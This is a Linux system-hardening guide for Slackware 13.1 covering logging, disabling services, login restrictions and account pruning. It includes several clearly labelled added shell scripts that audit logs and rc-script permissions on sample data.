Slackware System Hardening

Copyright (c) 2002, 2005, 2006, 2011 Jeffrey Denton
http://dentonj.freeshell.org/system-hardening-13.1.txt

Written by Jeffrey Denton <dentonj@gmail.com>
19 March 2011
Version - 0.9.0

** NOTE ** Added 20 January 2021
This was never finished. Posting for my own reference.

This is written for:

    $ cat /etc/slackware-version
    Slackware 13.1.0

This is a list of some of the steps I take to improve the security on my Slackware systems. It is by no means a complete list of everything that is possible. You can either do all of the things listed here, or you can choose the ones you feel would help secure your system.

WARNING: Hardening a system is a compromise between security and usability. Some of the things I do would adversely affect the usability of your system and may very well break things. Please have one of the following on hand just in case you lock yourself out of your system:

    Tom's Rootboot - http://www.toms.net/rb/
    The "Live" CD that comes with the official version of Slackware
    The Slackware Install CDs

You should make a backup of anything that you feel is important, would be hard to replace, or that you simply could not do without BEFORE implementing anything listed here. If you don't understand what a setting or configuration is doing, don't use it on your system. The contents of this document are only meant to be used on Slackware Linux. Some of the settings are redundant (defense in depth) or may conflict. You have been warned.

Notes:

- The settings assume that only one user, "dentonj", is on the system; adjust as necessary.
- Associated man pages are listed for further information.
- I will comment this document if I ever get around to it.
- This is still a draft as there are many TODO items.
- Before making changes to a file, it's a good idea to make a copy of the original file:

    cp syslog.conf syslog.conf.orig

----[ Keep Current ]----

    http://www.slackware.com/security/
    http://www.slackware.com/lists/

To subscribe to the Slackware Security mailing list, email majordomo@slackware.com with the phrase "subscribe slackware-security" in the body of the email.

----[ Logging ]----

/etc/rc.d/rc.syslog:

    echo -n "/usr/sbin/syslogd -m 10 -r -h"
    /usr/sbin/syslogd -m 10 -r -h

    root@darkstar:~# /etc/rc.d/rc.syslog restart

Shorten the "-- MARK --" timestamp interval from the default 20 minutes to 10 minutes. It is commonly recommended to set the timestamp interval to 0 to prevent the logs from filling up with "-- MARK --" entries. I've found that these entries are sometimes the only indication that can be used to determine when a system hung or crashed.

The "-r" option enables the system to receive syslog messages from remote hosts. The "-h" option allows syslog to forward messages it receives from remote hosts. This allows syslog messages to be logged on several systems for redundancy. Syslog messages that are sent over the network are not encrypted and can be easily captured. Watch out for syslog forwarding loops when using both "-r" and "-h".

There are two security concerns with using syslog to receive logs over the network. The first is that the information is not encrypted, so it can be intercepted. The second is that the system accepting remote logs is vulnerable to a denial of service attack: an attacker can fill up the filesystem by flooding the syslogd daemon. Use iptables to restrict who can send traffic to that port. Of course, this will not stop someone from spoofing traffic to appear to come from a trusted source.

Opens UDP port 514.
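The paragraph above is the reason for keeping the "-- MARK --" entries: a gap in them shows when the machine stopped. The script below is an added example, not part of the original document, that scans a syslog-style file for the largest gap between consecutive MARK lines and reports the last MARK before it. It assumes the standard "Mon DD HH:MM:SS" syslog timestamp and that all lines fall on the same day; the sample log it runs on is constructed.

```shell
#!/bin/sh
# Added example (not from the original document): find the largest gap between
# "-- MARK --" lines in a syslog file.  With "syslogd -m 10" a gap well beyond
# 10 minutes suggests the host hung, crashed or lost power shortly after the
# last MARK before the gap.  Assumption: all lines share one calendar day, so
# the arithmetic is done in minutes since midnight.
#
# Usage: mark_gaps <logfile> [interval_minutes]
# Prints: <largest gap in minutes> <date and time of the MARK before it> <verdict>
mark_gaps() {
    awk -v interval="${2:-10}" '
        $5 == "--" && $6 == "MARK" && $7 == "--" {
            split($3, t, ":")
            now = t[1] * 60 + t[2]               # minutes since midnight
            if (have_prev && now - prev > biggest) {
                biggest = now - prev
                at = prev_date " " prev_ts
            }
            prev = now; prev_ts = $3; prev_date = $1 " " $2; have_prev = 1
        }
        END {
            if (biggest > 0)
                print biggest, at, (biggest > 2 * interval ? "SUSPECT" : "normal")
            else
                print "0 none normal"
        }' "$1"
}

# Constructed sample: marks every 10 minutes, then a hole while the host was
# down, then the syslogd/kernel restart lines and marks resuming.
sample_log() {
    cat <<'EOF'
Mar 19 12:00:00 darkstar -- MARK --
Mar 19 12:10:00 darkstar -- MARK --
Mar 19 12:20:00 darkstar -- MARK --
Mar 19 13:10:00 darkstar syslogd 1.5.0: restart.
Mar 19 13:10:00 darkstar kernel: Linux version 2.6.33.4-smp
Mar 19 13:20:00 darkstar -- MARK --
Mar 19 13:30:00 darkstar -- MARK --
EOF
}

# Run the scan over the constructed sample; returns the report line.
demo_gap() {
    tmp=$(mktemp)
    sample_log > "$tmp"
    mark_gaps "$tmp" 10
    rm -f "$tmp"
}

case "${1:-}" in demo) demo_gap ;; esac
```

Run it as "sh mark_gaps.sh demo" for the constructed sample, or call mark_gaps /var/log/messages 10 on a real log. The verdict threshold (twice the configured interval) is a judgement call; one missed MARK can also mean syslogd was briefly stopped.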
    man syslogd
    man klogd

/etc/syslog.conf:

    # Log everything to a file
    *.*                     -/var/log/messages

    # Log everything to a tty (Ctrl-Alt-F12)
    *.*                     /dev/tty12

    # Log everything to a log host
    *.*                     @192.168.1.2

    # Display emergencies to everyone using wall
    *.=emerg                *

    # Send alerts directly to the user's terminals
    *.=alert                root,dentonj

    root@darkstar:~# /etc/rc.d/rc.syslog restart

The other option to logging everything to one file is to have a long syslog.conf file that splits the logs up among multiple files. In most cases, the default configuration file will do. Which method you decide on really comes down to user preference.

The "-" keeps syslogd from syncing the file every time an entry is written. This is a performance feature that may cause the loss of information if the system crashes. If performance is not a concern, or if the idea of losing logging information is a concern, then remove the "-".

    man syslogd

This manpage has a great description of how to deal with troublesome individuals.

    man syslog.conf

/etc/logrotate.conf:

    weekly
    rotate 26
    create
    compress
    shred
    include /etc/logrotate.d

    /var/log/wtmp {
        monthly
        create 0664 root utmp
        rotate 6
    }

    /var/log/btmp {
        monthly
        create 0600 root root
        rotate 6
    }

Logrotate is run at 4:40 every day by cron. The file that starts logrotate is /etc/cron.daily/logrotate. I like to keep logs for 6 months. Most people will think this is excessive. Make sure you have enough hard drive space to store 6 months worth of logs.

    root@darkstar:~# less /var/lib/logrotate/status

This file will give you the status of which log files are configured to be rotated and the last time they were rotated. Make sure that you have not missed a log file.
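Checking the status file by eye is error-prone once /var/log grows. The script below is an added example, not part of the original document: it lists the log files in a directory that never appear in logrotate's status file, which is exactly the "missed a log file" case. It assumes the status file format "<quoted path> <date>" used by logrotate 3.7.x; the log directory and status file it runs on are constructed.

```shell
#!/bin/sh
# Added example (not from the original document): list log files that logrotate
# has never touched, i.e. files under the log directory that are absent from the
# status file.  Rotated copies (*.1, *.2.gz, ...) are skipped.
#
# Usage: unrotated_logs <logdir> <statusfile>
# Real system:  unrotated_logs /var/log /var/lib/logrotate/status
unrotated_logs() {
    logdir=$1
    status=$2
    # Status lines look like:  "/var/log/messages" 2011-3-19
    # Keep only the quoted path.
    known=$(sed -n 's/^"\([^"]*\)".*/\1/p' "$status")
    for f in "$logdir"/*; do
        [ -f "$f" ] || continue
        case "$f" in
            *.[0-9]|*.[0-9].gz|*.[0-9][0-9]|*.[0-9][0-9].gz) continue ;;
        esac
        if ! printf '%s\n' "$known" | grep -qxF -- "$f"; then
            echo "$f"
        fi
    done
}

# Constructed stand-in for /var/log and the logrotate status file: sulog is
# present but has no status entry, so it is the one that should be reported.
demo_unrotated() {
    d=$(mktemp -d)
    mkdir "$d/log"
    for f in messages secure cron sulog messages.1.gz; do : > "$d/log/$f"; done
    cat > "$d/status" <<EOF
logrotate state -- version 2
"$d/log/messages" 2011-3-19
"$d/log/secure" 2011-3-19
"$d/log/cron" 2011-3-12
EOF
    unrotated_logs "$d/log" "$d/status" | sed "s|^$d/log/||"
    rm -rf "$d"
}

case "${1:-}" in demo) demo_unrotated ;; esac
```

A file that shows up here either needs an entry under /etc/logrotate.d or is one you have decided not to keep (the text names Xorg and dmesg); either way the decision should be deliberate rather than an oversight.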
    root@darkstar:~# last
    root@darkstar:~# last -f /var/log/wtmp.1.gz
    root@darkstar:~# lastb
    root@darkstar:~# lastb -f /var/log/btmp.1.gz

    man logrotate

/etc/logrotate.d/syslog:

    /var/log/cron /var/log/debug /var/log/maillog /var/log/messages /var/log/secure /var/log/spooler /var/log/sulog /var/log/syslog {
        create 0640 root root
        #mail dentonj@gmail.com
        #mailfirst
        sharedscripts
        postrotate
            /bin/kill -HUP `cat /var/run/syslogd.pid \
                2> /dev/null || true`
        endscript
    }

Even though I log everything to one file, I set up logrotate to back up all of the log files. The only logs that I'm not interested in retaining are those for Xorg or dmesg. Daemons such as Apache and vsftpd will have logrotate.d settings listed below.

    man logrotate

/etc/rc.d/rc.S:

    # Update the current kernel level in the /etc/motd (Message Of The Day) file,
    # if the first line of that file begins with the word 'Linux'.
    # You are free to modify the rest of the file as you see fit.
    #if [ -x /bin/sed ]; then
    #  /bin/sed -i "{1s/^Linux.*/$(/bin/uname -sr)\./}" /etc/motd
    #fi

The last 3 lines are uncommented by default. Since I like to set a custom message and provide a little less information about the system, I comment out the above lines. The default comment above is self explanatory.

    man motd

/etc/motd, /etc/issue.net, /boot/boot_message.txt:

    ****************************************************************
    Unauthorized access prohibited; all access and activities not
    explicitly authorized by the administrator are unauthorized. All
    activities are monitored and logged. There is no privacy on this
    system. Unauthorized access and activities or any criminal
    activity will be reported to appropriate authorities.
    ****************************************************************

Or:

    "You seem to be lost. Please return to your little corner of the Internet."

I use the first message for anyone that is logging into a system.
From what I've been told, if you don't have some sort of default message that indicates that there is no privacy on this computer, there is the chance that logs from it used in a court may possibly be thrown out. I've also been told the opposite is true. But since that lawyer did not represent me or look out for my best interests, I'll stick with the message. I use the second message when I don't care about pursuing legal action for unauthorized activities and want to let the offender know this isn't your ordinary computer.

Since we make a change to the message given by the boot loader, we have to rerun lilo.

    root@darkstar:~# lilo -v -p

If lilo returns an error, try to determine what the problem is and rerun lilo before you reboot the system. Otherwise, you may end up with a system that doesn't boot properly.

    man issue
    man motd
    man lilo

/etc/rc.d/rc.local:

    # Log icmp packets to syslog
    /usr/sbin/icmpinfo -v -n -p -s -l

This will log ICMP packets to syslog, except pings. There is the potential problem that someone could flood your logs and fill up your hard drive while logging ICMP packets.

    man icmpinfo

/sbin/accton:

Process accounting is turned on by /etc/rc.d/rc.M. However, the log file doesn't exist.

    root@darkstar:~# touch /var/log/pacct

    man ac
    man 2 acct
    man 5 acct
    man accton
    man sa
    man lastcomm
    info accounting

    root@darkstar:~# ac -d
    root@darkstar:~# ac -p

/etc/rc.d/rc.M:

Increase logging in cron.
    /usr/sbin/crond -l7 >> /var/log/cron 2>&1

    man crond

----[ Disable Daemons/Close Ports ]----

List the open sockets:

    root@darkstar:~# netstat -peanutgw
    Active Internet connections (servers and established)
    Proto Recv-Q Send-Q Local Address           Foreign Address         State       User       Inode      PID/Program name
    tcp        0      0 0.0.0.0:37              0.0.0.0:*               LISTEN      0          4117       1546/inetd
    tcp        0      0 0.0.0.0:6000            0.0.0.0:*               LISTEN      0          5556       1711/X
    tcp        0      0 0.0.0.0:113             0.0.0.0:*               LISTEN      0          4120       1546/inetd
    tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      0          4151       1555/sshd
    tcp6       0      0 :::6000                 :::*                    LISTEN      0          5555       1711/X
    tcp6       0      0 :::22                   :::*                    LISTEN      0          4153       1555/sshd
    udp        0      0 0.0.0.0:512             0.0.0.0:*                           0          4119       1546/inetd
    udp        0      0 0.0.0.0:37              0.0.0.0:*                           0          4118       1546/inetd
    raw        0      0 0.0.0.0:1               0.0.0.0:*               7           0          7764       2250/icmpinfo
    IPv6/IPv4 Group Memberships
    Interface       RefCnt Group
    --------------- ------ ---------------------
    lo              1      224.0.0.1
    lo              1      ff02::1
    eth0            1      ff02::1
    wlan0           1      ff02::1

/etc/inetd.conf:

The following are running by default:

    time   - TCP port 37
    time   - UDP port 37
    auth   - TCP port 113
    comsat - UDP port 512

Comment out the lines of the services that you don't need.

    root@darkstar:~# grep -v "^#" /etc/inetd.conf

    man inetd
    man in.comsat
    man in.identd
    man grep

/etc/rc.d/rc.inetd:

    root@darkstar:~# /etc/rc.d/rc.inetd stop
    root@darkstar:~# chmod a-x /etc/rc.d/rc.inetd

    man inetd
    man chmod

/usr/X11R6/bin/startx:

    defaultserverargs="-nolisten tcp"

Closes TCP port 6000+n, where n is $DISPLAY (the default is 0).

    man Xserver

/etc/X11/xdm/Xservers:

    :0 local /usr/bin/X -nolisten tcp :0

Closes TCP port 6000.

    man Xserver
    man xdm

/etc/X11/xdm/Xaccess:

Make sure everything is commented.

    man xdm

/etc/rc.d/rc.4:

    exec /usr/bin/xdm -nodaemon -udpPort 0
    exec /usr/X11R6/bin/xdm -nodaemon -udpPort 0

Closes UDP port 177.

    man xdm

/etc/X11/fs/config:

    use-syslog = yes
    no-listen = tcp

Closes TCP port 7100.

    man xfs

/etc/rc.d/rc.inet2:

Most of the rc.scripts are started here. From the script: "Uncomment or comment out sections depending on which services your site requires."
There are three ways to stop daemons and services from being started. The first way is to make the script starting the daemon or service non-executable:

    chmod 600 /etc/rc.d/rc.bind

The second way is to comment out the section of this script that starts the daemon or service:

Lines 95-97:

    # Start the BIND name server daemon:
    # if [ -x /etc/rc.d/rc.bind ]; then
    #   /etc/rc.d/rc.bind start
    # fi

The third way, if you are not going to use the service, is to remove the package. Removing the package will not remove the rc.script. The scripts are installed with the name rc.script.new and then renamed to rc.script.

    root@darkstar:~# removepkg bind

Comment out the following lines:

    Lines  20 -  37: Disable mounting of NFS filesystems
    Lines  43 -  45: Disable RPC portmapper
    Lines  63 -  68: Disable mount of SMB filesystems
    Lines  79 -  81: Disable IPv4 packet forwarding
    Lines  84 -  86: Disable inetd
    Lines  95 -  97: Disable BIND
    Lines 100 - 102: Disable NIS
    Lines 109 - 111: Disable NFS server

/etc/rc.d/rc.M:

Comment out the following lines:

    Lines 187 - 189: Disable dnsmasq
    Lines 141 - 143: Disable snmpd
    Lines 197 - 203: Disable CUPS and lpd
    Lines 206 - 208: Disable netatalk
    Lines 259 - 261: Disable atd
    Lines 296 - 298: Disable saslauthd
    Lines 301 - 303: Disable sendmail
    Lines 321 - 323: Disable MySQL
    Lines 326 - 328: Disable Apache
    Lines 331 - 333: Disable OpenLDAP
    Lines 337 - 339: Disable Samba
    Lines 347 - 349: Disable SystemV init scripts

/etc/rc.d/rc.acpid:

Advanced Configuration and Power Interface event daemon

    root@darkstar:~# /etc/rc.d/rc.acpid stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.acpid

Or:

    root@darkstar:~# removepkg acpid
    root@darkstar:~# rm -i /etc/rc.d/rc.acpid

This daemon doesn't open any ports.
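All three methods above come down to one thing at boot: rc.M and rc.inet2 only run an rc script if it is executable. The script below is an added example, not part of the original document, that audits a directory of rc scripts for that condition and reports any script you expected to be disabled but that is still executable. It runs against a constructed directory here; the paths and file names are stand-ins for /etc/rc.d.

```shell
#!/bin/sh
# Added example (not from the original document): which rc scripts would still
# be started at boot?  rc.M and rc.inet2 test "-x /etc/rc.d/rc.foo" before
# running a script, so executability is the single fact to audit.  Files ending
# in .new, .conf or .orig are skipped because the boot scripts never run them.
#
# Usage: enabled_rc_scripts <dir>          (real system: /etc/rc.d)
enabled_rc_scripts() {
    for f in "$1"/rc.*; do
        [ -f "$f" ] || continue
        case "$f" in
            *.new|*.conf|*.orig) continue ;;
        esac
        [ -x "$f" ] && basename "$f"
    done
}

# Usage: unexpected_enabled <dir> <script>...
# Prints each named script that is executable although you meant to disable it.
unexpected_enabled() {
    dir=$1; shift
    for want_off in "$@"; do
        enabled_rc_scripts "$dir" | grep -qx "$want_off" && echo "$want_off"
    done
}

# Constructed stand-in for /etc/rc.d: rc.inetd was disabled with chmod 600,
# rc.bind and rc.nfsd were forgotten and are still executable.
demo_rc_audit() {
    d=$(mktemp -d)
    for s in rc.bind rc.nfsd rc.sshd rc.syslog rc.inetd rc.inetd.new rc.wireless.conf; do
        : > "$d/$s"
    done
    chmod 755 "$d/rc.bind" "$d/rc.nfsd" "$d/rc.sshd" "$d/rc.syslog" "$d/rc.inetd.new"
    chmod 600 "$d/rc.inetd" "$d/rc.wireless.conf"
    unexpected_enabled "$d" rc.bind rc.inetd rc.nfsd | paste -sd' '
    rm -rf "$d"
}

case "${1:-}" in demo) demo_rc_audit ;; esac
```

Run enabled_rc_scripts /etc/rc.d after an upgrade as well: Slackware installs rc.script.new alongside the old script, and a careless merge can restore the executable bit on a script you had turned off.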
/etc/rc.d/rc.alsa:

Advanced Linux Sound Architecture

    root@darkstar:~# /etc/rc.d/rc.alsa stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.alsa

Or:

    root@darkstar:~# removepkg alsa-utils
    root@darkstar:~# removepkg alsa-lib
    root@darkstar:~# removepkg alsa-oss
    root@darkstar:~# rm -i /etc/rc.d/rc.alsa

This daemon doesn't open any ports.

/etc/rc.d/rc.atalk:

AppleTalk

    root@darkstar:~# /etc/rc.d/rc.atalk stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.atalk

Or:

    root@darkstar:~# removepkg netatalk
    root@darkstar:~# rm -i /etc/rc.d/rc.atalk

Closes TCP port 548.

/etc/rc.d/rc.autofs:

Automount for FILE, NIS, and LDAP

    root@darkstar:~# /etc/rc.d/rc.autofs stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.autofs

Or:

    root@darkstar:~# removepkg autofs
    root@darkstar:~# rm -i /etc/rc.d/rc.autofs

This daemon doesn't open any ports.

/etc/rc.d/rc.bind:

BIND

    root@darkstar:~# /etc/rc.d/rc.bind stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.bind

Or:

    root@darkstar:~# removepkg bind
    root@darkstar:~# rm -i /etc/rc.d/rc.bind

Closes TCP ports 53 and 953. Closes UDP ports 53 and 32768.

/etc/rc.d/rc.bluetooth:

Bluetooth stack for Linux

    root@darkstar:~# /etc/rc.d/rc.bluetooth stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.bluetooth

Or:

    root@darkstar:~# removepkg bluez
    root@darkstar:~# removepkg bluez-firmware
    root@darkstar:~# removepkg bluez-hcidump
    root@darkstar:~# rm -i /etc/rc.d/rc.bluetooth

/etc/rc.d/rc.cups:

Common UNIX Printing System

    root@darkstar:~# /etc/rc.d/rc.cups stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.cups

Or:

    root@darkstar:~# removepkg cups
    root@darkstar:~# rm -i /etc/rc.d/rc.cups

Closes TCP and UDP port 631.

/etc/rc.d/rc.dnsmasq:

A lightweight DHCP and caching DNS server

    root@darkstar:~# /etc/rc.d/rc.dnsmasq stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.dnsmasq

Or:

    root@darkstar:~# removepkg dnsmasq
    root@darkstar:~# rm -i /etc/rc.d/rc.dnsmasq

Closes TCP and UDP ports 53, 67, and 68.
/etc/rc.d/rc.fuse:

Filesystem in Userspace

    root@darkstar:~# /etc/rc.d/rc.fuse stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.fuse

Or:

    root@darkstar:~# removepkg fuse
    root@darkstar:~# rm -i /etc/rc.d/rc.fuse

This daemon doesn't open any ports.

/etc/rc.d/rc.gpm:

General Purpose Mouse; you will more than likely want to keep this.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.gpm

This daemon doesn't open any ports.

/etc/rc.d/rc.hald:

The HAL Hardware Abstraction Layer; you will more than likely want to keep this.

    root@darkstar:~# chmod go-rwx /etc/rc.d/rc.hald

This daemon doesn't open any ports.

/etc/rc.d/rc.httpd:

Apache webserver

    root@darkstar:~# /etc/rc.d/rc.httpd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.httpd

Or:

    root@darkstar:~# removepkg httpd
    root@darkstar:~# rm -i /etc/rc.d/rc.httpd

Closes TCP port 80.

/etc/rc.d/rc.inetd:

The Internet daemon

    root@darkstar:~# /etc/rc.d/rc.inetd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.inetd

Or:

    root@darkstar:~# removepkg inetd
    root@darkstar:~# rm -i /etc/rc.d/rc.inetd

Closes TCP ports 37 and 113 (by default). Closes UDP ports 37 and 512 (by default).

/etc/rc.d/rc.ip_forward:

IPv4 Packet Forwarding

    root@darkstar:~# /etc/rc.d/rc.ip_forward stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.ip_forward

The script is part of a package of network scripts that should not be removed.

/etc/rc.d/rc.messagebus:

D-Bus message bus system

    root@darkstar:~# /etc/rc.d/rc.messagebus stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.messagebus

Or:

    root@darkstar:~# cd /var/log/packages && removepkg dbus*
    root@darkstar:~# rm -i /etc/rc.d/rc.messagebus

/etc/rc.d/rc.mysqld:

The MySQL server daemon

By default, mysqld will not start. Read the /etc/rc.d/rc.mysqld file for details on how to start the daemon. The script prevents incoming network connections by default with the "--skip-networking" option. If this option is commented out, TCP port 3306 will be opened.
    root@darkstar:~# /etc/rc.d/rc.mysqld stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.mysqld

Or:

    root@darkstar:~# removepkg mysql
    root@darkstar:~# rm -i /etc/rc.d/rc.mysqld

This daemon doesn't open any ports by default.

/etc/rc.d/rc.nfsd:

The knfsd NFS daemon

By default, the daemon will not start because the file /etc/exports is not configured properly.

    root@darkstar:~# /etc/rc.d/rc.nfsd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.nfsd

Or:

    root@darkstar:~# removepkg nfs-utils
    root@darkstar:~# rm -i /etc/rc.d/rc.nfsd

/etc/rc.d/rc.ntpd:

Network Time Protocol

    root@darkstar:~# /etc/rc.d/rc.ntpd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.ntpd

Or:

    root@darkstar:~# removepkg ntp
    root@darkstar:~# rm -i /etc/rc.d/rc.ntpd

Closes TCP and UDP port 123.

/etc/rc.d/rc.rpc:

RPC portmapper

    root@darkstar:~# /etc/rc.d/rc.rpc stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.rpc

Or:

    root@darkstar:~# removepkg portmap
    root@darkstar:~# rm -i /etc/rc.d/rc.rpc

/etc/rc.d/rc.samba:

The Samba SMB file/print server

By default, the daemon will not start because the file /etc/samba/smb.conf is not present.

    root@darkstar:~# /etc/rc.d/rc.samba stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.samba

Or:

    root@darkstar:~# removepkg samba
    root@darkstar:~# rm -i /etc/rc.d/rc.samba

/etc/rc.d/rc.saslauthd:

Simple Authentication and Security Layer

    root@darkstar:~# /etc/rc.d/rc.saslauthd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.saslauthd

Or:

    root@darkstar:~# removepkg cyrus-sasl
    root@darkstar:~# rm -i /etc/rc.d/rc.saslauthd

/etc/rc.d/rc.sendmail:

Sendmail

    root@darkstar:~# /etc/rc.d/rc.sendmail stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.sendmail

Or:

    root@darkstar:~# removepkg sendmail
    root@darkstar:~# removepkg sendmail-cf
    root@darkstar:~# rm -i /etc/rc.d/rc.sendmail

Closes TCP ports 25 and 587.
/etc/rc.d/rc.snmpd:

Simple Network Management Protocol

    root@darkstar:~# /etc/rc.d/rc.snmpd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.snmpd

Or:

    root@darkstar:~# removepkg net-snmp
    root@darkstar:~# rm -i /etc/rc.d/rc.snmpd

/etc/rc.d/rc.sshd:

The Secure Shell Server

    root@darkstar:~# /etc/rc.d/rc.sshd stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.sshd

Or:

    root@darkstar:~# removepkg openssh
    root@darkstar:~# rm -i /etc/rc.d/rc.sshd

Closes TCP port 22.

/etc/rc.d/rc.syslog:

The system logging daemon; you will more than likely want to keep this. If the "-r" option is used, UDP port 514 is opened. This daemon doesn't open any ports by default.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.syslog

/etc/rc.d/rc.sysstat:

System performance monitoring tools

    root@darkstar:~# /etc/rc.d/rc.sysstat stop
    root@darkstar:~# chmod 600 /etc/rc.d/rc.sysstat

Or:

    root@darkstar:~# removepkg sysstat
    root@darkstar:~# rm -i /etc/rc.d/rc.sysstat

/etc/rc.d/rc.sysvinit:

"This file provides basic compatibility with SystemV style startup scripts." Unless you have installed a daemon that requires the use of SystemV style startup scripts, there is no need for it to be executable.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.sysvinit

/etc/rc.d/rc.udev:

"udev provides a dynamic device directory containing only the files for actually present devices. It creates and removes device node files usually located in the /dev directory." You will more than likely want to keep this. This daemon doesn't open any ports.

    root@darkstar:~# chmod 600 /etc/rc.d/rc.udev

    man udev

/etc/rc.d/rc.wireless.conf:

This file holds the configuration settings used by /etc/rc.d/rc.wireless. The file may hold encryption keys in plain text. Make sure that users are not able to read this file (the default setting).

    root@darkstar:~# chmod 600 /etc/rc.d/rc.wireless.conf

/etc/rc.d/rc.yp:

The Network Information Service

The contents of this file are commented out by default.
    root@darkstar:~# chmod 600 /etc/rc.d/rc.yp

Or:

    root@darkstar:~# removepkg yptools
    root@darkstar:~# rm -i /etc/rc.d/rc.yp

----[ Limit Access ]----

/etc/rc.d/rc.M:

    chmod 1733 /tmp /var/tmp

Prevents users from listing the contents of those directories. It still allows them to create, access, and modify files in those directories if they know the actual file name. This does not stop users from running executables in /tmp.

    dentonj@darkstar:~$ ls -ld /tmp
    drwx-wx-wt 5 root root 4096 2001-06-27 12:54 /tmp/
    dentonj@darkstar:~$ cp /bin/date /tmp/test
    dentonj@darkstar:~$ /tmp/test
    Thu Jun 27 12:55:00 MST 2001
    dentonj@darkstar:~$ ls /tmp
    ls: /tmp: Permission denied

    man chmod

/etc/rc.d/rc.S:

    chmod 1733 /tmp/.ICE-unix
    chmod 1733 /tmp/.X11-unix

Don't let everyone have read access to utmp:

    chmod 660 /var/run/utmp

    man utmp
    man chmod

/etc/lilo.conf:

    # mandatory  - enter a password with every boot
    # restricted - enter a password only when a boot time parameter
    #              is used (e.g. - "linux single")
    # Pick one
    mandatory
    #restricted
    # Use the "-p" option with the lilo command to store the hashed password
    # in a separate file
    password=""
    prompt
    timeout=0
    #menu-title="Unauthorized Access Prohibited"
    message=/boot/boot_message.txt
    serial=0,9600n8

    root@darkstar:~# lilo -v -p
    root@darkstar:~# chmod go-rwx /etc/lilo.conf

Using the setting 'password=""' and then the '-p' option with lilo will prompt you to enter a pass phrase while lilo is running. The pass phrase is hashed and stored in /etc/lilo.conf.shs. The man page for lilo claims that the hashed pass phrase is stored in /etc/lilo.conf.crc. Either way, it's better than having the password listed in /etc/lilo.conf in plain text.

The configuration options above will require the password to be entered whenever the system boots. You may not want to use the "mandatory" setting if uptime is important or when you normally only access the system remotely. In these cases, use "restricted" instead.
    man lilo
    man lilo.conf

/etc/login.access:

    +:root dentonj:LOCAL
    -:ALL:ALL

    root@darkstar:~# chmod go-rwx /etc/login.access

Only root and dentonj can log in locally. This does not affect logging in via ssh.

Error generated: "Login incorrect"

    man login.access

/etc/login.defs:

    FAIL_DELAY              15
    LOG_UNKFAIL_ENAB        yes
    LOG_OK_LOGINS           yes
    SULOG_FILE              /var/log/sulog
    ISSUE_FILE              /etc/issue
    #HUSHLOGIN_FILE
    UMASK                   077
    PASS_MAX_DAYS           90
    PASS_MIN_LEN            18
    ENCRYPT_METHOD          SHA512
    SHA_CRYPT_MIN_ROUNDS    500000
    SHA_CRYPT_MAX_ROUNDS    500000
    DEFAULT_HOME            no
    #ENVIRON_FILE

    root@darkstar:~# touch /var/log/sulog
    root@darkstar:~# passwd
    root@darkstar:~# chage -M 90 -W 7 root
    root@darkstar:~# chage -M 90 -W 7 dentonj
    dentonj@darkstar:~$ passwd

Setting the number of SHA rounds to 500000 means that it takes a little longer to log in. If you are using a slow computer, you may have to adjust the number of rounds used.

    man login.defs
    man passwd

/etc/suauth:

    ALL:ALL EXCEPT dentonj:DENY

Or:

    ALL:ALL EXCEPT GROUP wheel:DENY

    root@darkstar:~# usermod -g users -G wheel dentonj
    root@darkstar:~# chmod go-rwx /etc/suauth

Only dentonj is allowed to switch users. Or, only members of the wheel group can switch users.

Error generated: "Access to su to that account DENIED." / "You are not authorized to su root"

    man suauth

/etc/porttime:

    *:root,dentonj:Al0000-2400
    *:*:

    root@darkstar:~# chmod go-rwx /etc/porttime

The third field lists the times at which a user is allowed to log in. If that field is empty, the user is not allowed to log in at all. The "*:*:" entry is therefore a default deny rule that catches everyone not already listed. The daemon logoutd is normally run to enforce the login time restrictions listed in /etc/porttime.
Error generated: "Invalid login time"

    man porttime

/etc/rc.d/rc.local:

    # Enforce login time restrictions set in /etc/porttime
    if [ -x /usr/sbin/logoutd ]; then
      /usr/sbin/logoutd
    fi

    man logoutd

/etc/limits:

    dentonj C0L1
    *       L0

    root@darkstar:~# chmod go-rwx /etc/limits

The setting "* L0" is a default rule for anyone not previously listed. The number of logins permitted is set to zero, which means anyone not previously listed is not allowed to log in. This does not affect root. The "C0" setting keeps users from creating core dumps.

Error generated: "Too many logins."

    man limits

/etc/shells:

Allowing users to run different shells allows them to bypass any security restrictions set on their login shell. Delete the following:

    /bin/ash
    /bin/csh
    /bin/ksh
    /bin/tcsh
    /bin/zsh

    root@darkstar:~# removepkg ash
    root@darkstar:~# removepkg ksh93
    root@darkstar:~# removepkg tcsh
    root@darkstar:~# removepkg zsh

    man shells

/usr/sbin/faillog:

    root@darkstar:~# faillog -u dentonj -m 10
    root@darkstar:~# faillog -a

Don't set faillog for root. This is one of the few settings that can actually stop root from logging in. Using faillog can cause a denial of service if the maximum number of failed logins is reached. Use faillog with caution.

Error generated: "Login incorrect"

    man faillog

/etc/passwd:

According to the Linux Standard Base Specification 4.1, the only required user accounts are root, bin, and daemon. All other accounts are optional. Delete any unused accounts. The following lists the number of files and directories that are owned by each account.

    root@darkstar:~# for i in `cat /etc/passwd | awk -F: '{print $1}'`; do
    > echo -n "$i - "
    > find / -user $i -ignore_readdir_race | wc -l
    > done
    root - 374210
    bin - 3
    daemon - 10
    adm - 0
    lp - 1
    sync - 0
    shutdown - 0
